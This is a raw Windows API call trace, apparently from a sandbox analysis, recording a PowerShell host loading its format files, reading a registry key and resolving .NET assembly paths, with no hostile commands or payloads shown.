	[0398.448] ReadFile (in: hFile=0x304, lpBuffer=0x33b8fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x33b8fb8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.448] ReadFile (in: hFile=0x304, lpBuffer=0x33b8fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x33b8fb8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.449] ReadFile (in: hFile=0x304, lpBuffer=0x33b8fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x33b8fb8*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.449] ReadFile (in: hFile=0x304, lpBuffer=0x33b8fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x33b8fb8*, lpNumberOfBytesRead=0x28d478*=0xfb2, lpOverlapped=0x0) returned 1
	[0398.449] ReadFile (in: hFile=0x304, lpBuffer=0x33b86d2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x33b86d2*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0398.450] ReadFile (in: hFile=0x304, lpBuffer=0x33b8fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x33b8fb8*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0398.450] CloseHandle (hObject=0x304) returned 1
	[0398.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.450] SetErrorMode (uMode=0x1) returned 0x1
	[0398.450] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0398.450] SetErrorMode (uMode=0x1) returned 0x1
	[0398.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.450] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x304) returned 0x0
	[0398.450] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0398.451] CoTaskMemAlloc (cb=0x5a) returned 0x1b765cc0
	[0398.451] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1b765cc0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0398.451] CoTaskMemFree (pv=0x1b765cc0) 
	[0398.451] RegCloseKey (hKey=0x304) returned 0x0
	[0398.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.452] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7c689d4e, Data2=0x587b, Data3=0x474b, Data4=([0]=0x91, [1]=0xb7, [2]=0x21, [3]=0x36, [4]=0xac, [5]=0x5, [6]=0x16, [7]=0x75))) returned 0x0
	[0398.457] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xd5bdd18b, Data2=0xd4f1, Data3=0x490e, Data4=([0]=0x9f, [1]=0xb, [2]=0x3d, [3]=0x1e, [4]=0x82, [5]=0x66, [6]=0x45, [7]=0xab))) returned 0x0
	[0398.458] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x55229395, Data2=0x2c54, Data3=0x4410, Data4=([0]=0x80, [1]=0xa4, [2]=0x63, [3]=0xa9, [4]=0x3a, [5]=0x13, [6]=0xa, [7]=0xe1))) returned 0x0
	[0398.459] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x49b938e9, Data2=0xb65c, Data3=0x4a71, Data4=([0]=0xa3, [1]=0x3c, [2]=0x71, [3]=0x91, [4]=0x7c, [5]=0xe9, [6]=0xf1, [7]=0xb6))) returned 0x0
	[0398.459] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x9e88b5d, Data2=0x9aaf, Data3=0x421d, Data4=([0]=0x9b, [1]=0x31, [2]=0x49, [3]=0x64, [4]=0x7c, [5]=0x22, [6]=0x3c, [7]=0x5f))) returned 0x0
	[0398.460] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xde809d3, Data2=0x22d6, Data3=0x474e, Data4=([0]=0xb1, [1]=0x5c, [2]=0x90, [3]=0x64, [4]=0xb1, [5]=0x9b, [6]=0xc2, [7]=0xb9))) returned 0x0
	[0398.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.461] SetErrorMode (uMode=0x1) returned 0x1
	[0398.461] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0398.461] GetFileType (hFile=0x304) returned 0x1
	[0398.461] SetErrorMode (uMode=0x1) returned 0x1
	[0398.461] GetFileType (hFile=0x304) returned 0x1
	[0398.461] ReadFile (in: hFile=0x304, lpBuffer=0x3404d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3404d18*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.462] ReadFile (in: hFile=0x304, lpBuffer=0x3404d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3404d18*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.463] ReadFile (in: hFile=0x304, lpBuffer=0x3404d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3404d18*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.463] ReadFile (in: hFile=0x304, lpBuffer=0x3404d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3404d18*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.464] ReadFile (in: hFile=0x304, lpBuffer=0x3404d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3404d18*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.464] ReadFile (in: hFile=0x304, lpBuffer=0x3404d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3404d18*, lpNumberOfBytesRead=0x28d478*=0x1000, lpOverlapped=0x0) returned 1
	[0398.464] ReadFile (in: hFile=0x304, lpBuffer=0x3404d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3404d18*, lpNumberOfBytesRead=0x28d478*=0xaca, lpOverlapped=0x0) returned 1
	[0398.464] ReadFile (in: hFile=0x304, lpBuffer=0x340434a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x340434a*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0398.464] ReadFile (in: hFile=0x304, lpBuffer=0x3404d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d478, lpOverlapped=0x0 | out: lpBuffer=0x3404d18*, lpNumberOfBytesRead=0x28d478*=0x0, lpOverlapped=0x0) returned 1
	[0398.464] CloseHandle (hObject=0x304) returned 1
	[0398.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.465] SetErrorMode (uMode=0x1) returned 0x1
	[0398.465] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0398.465] SetErrorMode (uMode=0x1) returned 0x1
	[0398.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.465] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d508 | out: phkResult=0x28d508*=0x304) returned 0x0
	[0398.465] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d48c, lpData=0x0, lpcbData=0x28d488*=0x0 | out: lpType=0x28d48c*=0x1, lpData=0x0, lpcbData=0x28d488*=0x56) returned 0x0
	[0398.465] CoTaskMemAlloc (cb=0x5a) returned 0x1b765cc0
	[0398.465] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d45c, lpData=0x1b765cc0, lpcbData=0x28d458*=0x56 | out: lpType=0x28d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d458*=0x56) returned 0x0
	[0398.465] CoTaskMemFree (pv=0x1b765cc0) 
	[0398.465] RegCloseKey (hKey=0x304) returned 0x0
	[0398.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0398.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0398.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0398.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0398.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0398.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0398.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0398.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0398.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0398.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0399.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0399.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0399.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0399.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0399.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0399.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0399.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.607] VirtualQuery (in: lpAddress=0x28bfa0, lpBuffer=0x28ce60, dwLength=0x30 | out: lpBuffer=0x28ce60*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.608] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xab2af164, Data2=0x4be0, Data3=0x42cf, Data4=([0]=0xbe, [1]=0x84, [2]=0x6, [3]=0xfc, [4]=0x94, [5]=0xa8, [6]=0xdc, [7]=0xf0))) returned 0x0
	[0399.609] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xb774e27f, Data2=0x63e0, Data3=0x47bd, Data4=([0]=0x93, [1]=0x1c, [2]=0xe4, [3]=0x86, [4]=0x47, [5]=0xfe, [6]=0x63, [7]=0x61))) returned 0x0
	[0399.609] VirtualQuery (in: lpAddress=0x28c150, lpBuffer=0x28d010, dwLength=0x30 | out: lpBuffer=0x28d010*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.610] VirtualQuery (in: lpAddress=0x28c150, lpBuffer=0x28d010, dwLength=0x30 | out: lpBuffer=0x28d010*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.611] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x10957f1b, Data2=0x65, Data3=0x4fbf, Data4=([0]=0xb4, [1]=0x6b, [2]=0xd3, [3]=0xcf, [4]=0x51, [5]=0x69, [6]=0x2, [7]=0xc7))) returned 0x0
	[0399.614] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x84ab417a, Data2=0x5566, Data3=0x409b, Data4=([0]=0x9c, [1]=0x22, [2]=0x39, [3]=0xd1, [4]=0x1b, [5]=0x0, [6]=0xa6, [7]=0x4f))) returned 0x0
	[0399.614] VirtualQuery (in: lpAddress=0x28c3a0, lpBuffer=0x28d260, dwLength=0x30 | out: lpBuffer=0x28d260*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.615] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.615] VirtualQuery (in: lpAddress=0x28c0e0, lpBuffer=0x28cfa0, dwLength=0x30 | out: lpBuffer=0x28cfa0*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.615] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x189dfa4a, Data2=0xb584, Data3=0x452f, Data4=([0]=0xb8, [1]=0xa3, [2]=0x8d, [3]=0xdb, [4]=0xdf, [5]=0xb2, [6]=0x16, [7]=0x4d))) returned 0x0
	[0399.615] VirtualQuery (in: lpAddress=0x28c3a0, lpBuffer=0x28d260, dwLength=0x30 | out: lpBuffer=0x28d260*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.615] VirtualQuery (in: lpAddress=0x28c1c0, lpBuffer=0x28d080, dwLength=0x30 | out: lpBuffer=0x28d080*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.616] VirtualQuery (in: lpAddress=0x28ba10, lpBuffer=0x28c8d0, dwLength=0x30 | out: lpBuffer=0x28c8d0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.616] VirtualQuery (in: lpAddress=0x28ba10, lpBuffer=0x28c8d0, dwLength=0x30 | out: lpBuffer=0x28c8d0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.616] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x2689b0ea, Data2=0x132a, Data3=0x4150, Data4=([0]=0x86, [1]=0x68, [2]=0x8c, [3]=0xe1, [4]=0xc2, [5]=0x2d, [6]=0xcc, [7]=0x8d))) returned 0x0
	[0399.616] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xa36b29c5, Data2=0x6fb3, Data3=0x459c, Data4=([0]=0x88, [1]=0xa9, [2]=0xcc, [3]=0x7f, [4]=0xe6, [5]=0x23, [6]=0x6, [7]=0xf))) returned 0x0
